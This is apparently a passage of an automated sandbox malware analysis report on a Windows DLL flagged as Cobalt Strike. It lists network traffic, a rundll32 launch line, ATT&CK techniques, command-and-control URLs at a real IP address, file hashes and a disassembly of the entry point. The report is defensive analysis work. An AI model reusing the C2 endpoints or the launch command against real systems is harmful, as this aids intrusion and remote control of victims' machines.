          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49893
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49894
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49896
          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49897
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\loaddll64.exe TID: 4456Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp
          Source: rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.638463939.0000012254C98000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.93.6.31 145
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000019BD8312B5C GetUserNameA,strrchr,_snprintf,

          Remote Access Functionality:

          barindex
          Yara detected CobaltStrikeShow sources
          Source: Yara matchFile source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion11OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 490528 Sample: GnGmRmwtZJjkTEt.dll Startdate: 25/09/2021 Architecture: WINDOWS Score: 88 21 Found malware configuration 2->21 23 Malicious sample detected (through community Yara rule) 2->23 25 Yara detected CobaltStrike 2->25 27 2 other signatures 2->27 7 loaddll64.exe 1 2->7         started        process3 process4 9 rundll32.exe 12 7->9         started        12 rundll32.exe 12 7->12         started        15 cmd.exe 1 7->15         started        dnsIp5 29 System process connects to network (likely due to code injection or exploit) 9->29 19 185.93.6.31, 49740, 49741, 49742 CDN77GB France 12->19 17 rundll32.exe 12 15->17         started        signatures6 process7

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GnGmRmwtZJjkTEt.dll6%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ80%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJx0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJeK0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ-/E0%Avira URL Cloudsafe
          185.93.6.310%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2;/30%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ4899f5f57b9a0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N20%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJmK0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJE0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2dll0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2$c0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJOMDCBHADPPFCEHFDNPACA0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJeQ0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2&0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJsc0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJMQ0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJindows0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJography0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJws0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJkh0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ$0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8-0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2L0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ5K0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJph0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ~h0%Avira URL Cloudsafe
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJT0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          185.93.6.31true
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2true
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJtrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJxrundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJeKrundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ-/Erundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Register/v7.19/UJCIF1N2;/3rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJ4899f5f57b9arundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJmKrundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://185.93.6.31:8081/Calculate/team/WIQK6GMJErundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://jqueryui.comrundll32.exe, 00000005.00000003.335866871.00000243BC911000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000002.641154135.00000243BE628000.00000004.00000001.sdmpfalse
            		high
            http://185.93.6.31:8081/Register/v7.19/UJCIF1N2dllrundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Register/v7.19/UJCIF1N2$crundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJOMDCBHADPPFCEHFDNPACArundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJeQrundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Register/v7.19/UJCIF1N2&rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJscrundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJMQrundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJindowsrundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJographyrundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJwsrundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJkhrundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJ$rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://185.93.6.31:8081/Calculate/team/WIQK6GMJMKrundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpfalse
              		unknown
              http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8-rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://185.93.6.31:8081/Register/v7.19/UJCIF1N2Lrundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://185.93.6.31:8081/Calculate/team/WIQK6GMJ5Krundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://185.93.6.31:8081/Calculate/team/WIQK6GMJphrundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://185.93.6.31:8081/Calculate/team/WIQK6GMJ~hrundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://185.93.6.31:8081/Calculate/team/WIQK6GMJTrundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              185.93.6.31
              		unknownFrance
              		60068CDN77GBtrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:490528
              Start date:25.09.2021
              Start time:20:17:14
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 23s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:GnGmRmwtZJjkTEt.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Run name:Run with higher sleep bypass
              Number of analysed new started processes analysed:29
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal88.troj.evad.winDLL@9/0@0/1
              EGA Information:
              • Successful, ratio: 75%
              HDC Information:
              • Successful, ratio: 3.5% (good quality ratio 2.7%)
              • Quality average: 61.9%
              • Quality standard deviation: 41.1%
              HCA Information:
              • Successful, ratio: 86%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Sleeps bigger than 120000ms are automatically reduced to 1000ms
              • Found application associated with file extension: .dll
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 93.184.221.240, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235
              • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              CDN77GBGnGmRmwtZJjkTEt.dllGet hashmaliciousBrowse
              • 185.93.6.31
              INVOICE.exeGet hashmaliciousBrowse
              • 89.187.165.193
              9eh0jsdlic.exeGet hashmaliciousBrowse
              • 84.17.52.51
              globalfoundries.com.htmGet hashmaliciousBrowse
              • 89.187.169.47
              globalfoundries.com.htmGet hashmaliciousBrowse
              • 89.187.169.47
              blg.com.htmGet hashmaliciousBrowse
              • 89.187.169.47
              1J5sT000kJ.exeGet hashmaliciousBrowse
              • 156.146.50.177
              sora.arm7Get hashmaliciousBrowse
              • 195.181.169.2
              lBxUmgptLlGet hashmaliciousBrowse
              • 156.146.54.96
              GeruDanfe.msiGet hashmaliciousBrowse
              • 89.187.165.193
              NphUWSRtl4Get hashmaliciousBrowse
              • 104.238.37.84
              S6DNzkh376Get hashmaliciousBrowse
              • 156.146.54.93
              qLadwVPkMzGet hashmaliciousBrowse
              • 156.146.54.80
              y1FOl1vVPA.exeGet hashmaliciousBrowse
              • 84.17.46.50
              sb3TEzvdATGet hashmaliciousBrowse
              • 156.146.54.92
              4fy0Wb1EUX.exeGet hashmaliciousBrowse
              • 212.102.39.205
              KO7UuzwSSQ.exeGet hashmaliciousBrowse
              • 84.17.52.9
              wbEjg6mZB8.exeGet hashmaliciousBrowse
              • 195.181.169.92
              35ssjgTNda.exeGet hashmaliciousBrowse
              • 84.17.52.18
              UNj0uT3a36.exeGet hashmaliciousBrowse
              • 195.181.169.92

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
              Entropy (8bit):4.963098044166054
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.41%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • VXD Driver (31/22) 0.03%
              File name:GnGmRmwtZJjkTEt.dll
              File size:95803
              MD5:c84d4ead6c5a2afa9e844806de549dcf
              SHA1:328b4f055dce47161d735ef74f982925def45ee5
              SHA256:829751cfdc2376e916244f94baf839ce4491ccb75f0a89778c092bde79bd8643
              SHA512:ea1544209ea29df196ec9fe4075624c666e3018cb13e640a16ecac23079376444278288813fa709cc97a9a997cd47cd5e18b2256c2605883ed2d3e8479df00ad
              SSDEEP:768:O9zcAqwQoJ2UM9HomkyMwT+MhYlV6DRPdetYQkZIdEKDWr+BTgp3bLCP6yqn8RU:OmpIJ3R1yMcYD6DmqBoKa8MCSU
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...'.Ma.$........& ...#.....8......P..........k.....................................D........ ............................

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x6bc01350
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x6bc00000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x614DFE27 [Fri Sep 24 16:34:47 2021 UTC]
              TLS Callbacks:0x6bc01810
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:2b85eda5e2ca4805e05003741ab3fe72

              Entrypoint Preview

              Instruction
              dec eax
              mov eax, dword ptr [00002F09h]
              mov dword ptr [eax], 00000000h
              jmp 00007F80CCAAF8C3h
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              mov edx, ecx
              dec eax
              lea ecx, dword ptr [00005C86h]
              jmp 00007F80CCAB0AF6h
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F80CCAAFA09h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              test edx, edx
              je 00007F80CCAAFA48h
              dec ebp
              lea edx, dword ptr [ecx-01h]
              xor eax, eax
              dec esp
              lea ecx, dword ptr [ecx+edx]
              nop
              dec eax
              arpl ax, dx
              dec esp
              cmp edx, edx
              je 00007F80CCAAFA3Ah
              inc ecx
              movzx edx, byte ptr [eax+edx]
              xor byte ptr [ecx], dl
              dec eax
              add ecx, 01h
              add eax, 01h
              dec esp
              cmp ecx, ecx
              jne 00007F80CCAAFA07h
              ret
              nop dword ptr [eax+00h]
              inc ecx
              movzx eax, byte ptr [eax]
              xor byte ptr [ecx], al
              dec eax
              add ecx, 01h
              dec esp
              cmp ecx, ecx
              je 00007F80CCAAFA0Eh
              mov eax, 00000001h
              jmp 00007F80CCAAF9ECh
              nop word ptr [eax+eax+00000000h]
              mov eax, 00000001h
              ret
              nop word ptr [eax+eax+00000000h]
              inc ecx
              push esp
              push edi
              push esi
              push ebx
              dec eax
              sub esp, 48h
              mov ecx, dword ptr [00001C69h]
              dec eax
              lea eax, dword ptr [00001CA2h]
              xor edx, edx

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x80000x52.edata
              IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x3d0.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x348.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x50000x1d4.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xd0000x60.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x40400x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x91140xd8.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

